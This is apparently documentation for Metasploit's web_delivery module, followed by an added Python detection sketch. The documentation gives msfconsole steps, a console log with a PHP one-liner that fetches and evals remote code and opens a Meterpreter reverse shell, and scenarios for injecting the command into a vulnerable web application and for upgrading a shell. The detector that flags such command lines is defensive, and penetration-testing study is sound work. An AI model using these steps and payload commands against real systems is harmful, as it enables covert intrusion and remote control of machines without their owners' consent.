As a web server, web_delivery provides a great way to deliver a payload during post exploitation, with the intention of staying stealthy because the payload does not touch the disk.

Currently, web_delivery supports three different languages for delivery: Python, PHP, and PowerShell. You should be able to tell which one you can use based on the target environment you are in. For example, if you have gained access through a PHP application, then it's safe to assume you can use PHP. If you're on a Windows server (such as Windows Server 2008), then it's probably safe to say the target supports PowerShell.

## Verification Steps

To be able to use web_delivery, you must first gain access to the target machine, with the ability to execute the Python, PHP, or PowerShell interpreter.

At that point, you would use web_delivery similar to the following example:

1. Start msfconsole
2. Do: ```use exploit/multi/script/web_delivery```
3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options)
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target)
5. Do: ```set LHOST IP``` (The IP the payload should connect back to)
6. Do: ```run```
7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
8. Copy the command. Depending on your pentesting scenario, typically you can either inject the command and get code execution, or run it from the target's shell, and get a session:

```
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.23.1:4444
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9
[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));"
[*] Delivering Payload
[*] Sending stage (33684 bytes) to 172.16.23.134
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600
```

## Targets

**Python**

Python is a fairly popular language, especially on Unix-based systems. For example, it has come with Ubuntu Linux by default since 8.04, as well as with Debian, and with Mac OS X since 10.3.

**PHP**

PHP is a fairly popular language for web servers, especially Apache.

**Powershell/win**

PowerShell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 are the first Windows versions to come with PowerShell by default; older systems do not include it.

## Scenarios

**Against a compromised web application**

web_delivery would work nicely for a web application with a command execution vulnerability. One way to approach this would be:

1. Start exploit/multi/script/web_delivery
2. Use Burp Suite to intercept the HTTP/HTTPS request, and place the command in the parameter that results in arbitrary code execution.
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.

**Shell upgrade**

web_delivery is also useful to upgrade a shell type payload to a meterpreter one. Here's how that can be done:

1. Start exploit/multi/script/web_delivery that generates/
2. On msfconsole, interact with the shell, and copy/paste the command.
3. You should get a meterpreter session.
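
Because the payload never touches the disk, the command the module prints in the Verification Steps output is the main host-side artifact a defender can log. The following is an added detection sketch, not part of the module or the original page: it flags process command lines where one of the interpreters named here runs inline code that references a URL. The function names, flag table and sample command lines (other than the first, taken from the console output) are assumptions made for the example.

```python
import re
import shlex
# Interpreters named on this page, with the flag each uses to run inline code.
INLINE_FLAGS = {"php": {"-r"}, "python": {"-c"}, "powershell": {"-c", "-command"}}
URL_RE = re.compile(r"https?://[^\s'\"()]+")

def inspect(cmdline):
    """Return a finding dict if cmdline runs inline code that references a URL."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:              # unbalanced quotes: fall back to whitespace split
        argv = cmdline.split()
    if not argv:
        return None
    # Normalise /usr/bin/php7.4, python3, powershell.exe -> php, python, powershell
    exe = re.sub(r"[\d.]+$", "", re.sub(r"\.exe$", "", argv[0].rsplit("/", 1)[-1].lower()))
    flags = INLINE_FLAGS.get(exe)
    if flags is None:
        return None
    args = argv[1:]
    for i, arg in enumerate(args[:-1]):
        if arg.lower() in flags:
            match = URL_RE.search(args[i + 1])
            if match:
                return {
                    "interpreter": exe,
                    "url": match.group(0),
                    # The PHP command on this page forces allow_url_fopen on.
                    "fopen_override": any(a.lower().startswith("allow_url_fopen=") for a in args),
                }
    return None

def scan(cmdlines):
    """Return (cmdline, finding) pairs for every flagged command line."""
    return [(c, f) for c in cmdlines if (f := inspect(c))]

# First entry is the command from the console output above; the rest are
# constructed sample process command lines for the example.
SAMPLE_CMDLINES = [
    'php -d allow_url_fopen=true -r "eval(file_get_contents(\'http://172.16.23.1:8080/z5inGkwCCQiz9\'));"',
    "/usr/bin/php7.4 -r \"eval(file_get_contents('https://192.0.2.10/a'));\"",
    'php -r "echo PHP_VERSION;"',
    'python3 -c "import sys; print(sys.version)"',
    "php /var/www/html/cron.php http://example.com/feed",
]

if __name__ == "__main__":
    for cmd, finding in scan(SAMPLE_CMDLINES):
        print(finding["interpreter"], finding["url"], "<-", cmd)
```

The splitter uses POSIX quoting rules, so command lines with backslash-separated Windows paths need a Windows-aware tokenizer before being passed to `inspect`. Treat a hit as a lead to correlate with the outbound connection from the same host, since legitimate scripts occasionally pass URLs to inline code as well.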